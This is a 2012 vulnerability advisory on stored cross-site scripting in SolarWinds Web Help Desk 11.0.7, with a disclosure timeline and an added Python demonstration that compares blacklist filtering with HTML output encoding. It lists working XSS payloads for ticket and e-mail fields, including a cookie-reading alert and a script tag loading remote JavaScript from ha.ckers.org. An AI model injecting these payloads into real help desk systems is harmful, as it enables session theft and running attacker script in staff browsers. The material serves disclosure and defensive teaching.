# Author: loneferret of Offensive Security
# Product: Web Help Desk by SolarWinds
# Version: 11.0.7 (older versions may be affected)
# Vendor Site: http://www.webhelpdesk.com
# Software Download: http://www.webhelpdesk.com/help-desk-software/
# Discovered: August 18th 2012
# Disclosure:
# August 19th 2012: Reported to CERT
# August 24th 2012: Public disclosure date is October 8th 2012
# August 28th 2012: Vendor responded, should fix by disclosure date
# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'
# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*
# September 21 2012: Vendor sends pre-release version to test (11.0.8)
# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section" but not in Tickets
# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fixed in next version
# October 8th 2012: Public release
# Vulnerabilities:
# Stored XSS via client web ticket submit system
# Affected fields: Subject & Request Details
# Payload: <script>alert(document.cookie);</script>
# Stored XSS via E-Mail
# Tickets created automatically via e-mail will also trigger the XSS when viewed.
# The following payloads are triggered with the default regular expression filters
# Body field
# Payloads:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<iframe SRC="javascript:alert('XSS Body');"></iframe>
# Subject field
# Payloads:
<BODY ONLOAD=alert('XSS')>**
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<iframe SRC="javascript:alert('XSS Subject');"></iframe>
# *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.
# Some payloads:
# <SCRIPT SRC=http://ha.ckers.org/xss.js>
# <XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
# **To trigger the XSS, one must click on "My Tickets" or "Group Tickets"
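# Added example, not part of the original advisory and not the vendor's code: it renders the Subject and Body of an e-mail-created ticket twice, once through a blacklist regex and once through HTML output encoding, to show why the listed payloads get past pattern filters.
# Assumptions: the regex is a hypothetical stand-in (the product's real filter expressions are not given here), and the message, addresses and HTML template are constructed for the test.

```python
import html
import re
from email import message_from_string

# Constructed inbound message; Subject and body reuse markup listed in the advisory.
RAW_EMAIL = """\
From: client@example.com
To: helpdesk@example.com
Subject: <BODY ONLOAD=alert('XSS')>
Content-Type: text/plain

<iframe SRC="javascript:alert('XSS Body');"></iframe>
"""

# Hypothetical blacklist filter (assumption, NOT the product's real expressions):
# removes paired <script>...</script> blocks and nothing else.
SCRIPT_BLOCK = re.compile(r"<script\b.*?</script>", re.I | re.S)

# Crude check used only by this example: is an active tag still present in the output?
LIVE_TAG = re.compile(r"<\s*(script|iframe|body)\b", re.I)


def blacklist_filter(value):
    """Pattern-based input filtering: anything the pattern misses passes through."""
    return SCRIPT_BLOCK.sub("", value)


def encode_for_html(value):
    """Output encoding: & < > " ' become entities, so the value renders as text only."""
    return html.escape(value, quote=True)


def ticket_fields(raw):
    """Extract the two fields the advisory names from a single-part message."""
    msg = message_from_string(raw)
    return {"subject": msg["Subject"] or "", "body": msg.get_payload()}


def render_ticket(fields, sanitize):
    """Build the ticket view, passing each untrusted field through `sanitize`."""
    return '<div class="ticket"><h2>{}</h2><pre>{}</pre></div>'.format(
        sanitize(fields["subject"]), sanitize(fields["body"]))


def has_live_markup(page):
    return bool(LIVE_TAG.search(page))


if __name__ == "__main__":
    fields = ticket_fields(RAW_EMAIL)
    print("blacklist :", has_live_markup(render_ticket(fields, blacklist_filter)))
    print("encoded   :", has_live_markup(render_ticket(fields, encode_for_html)))
```
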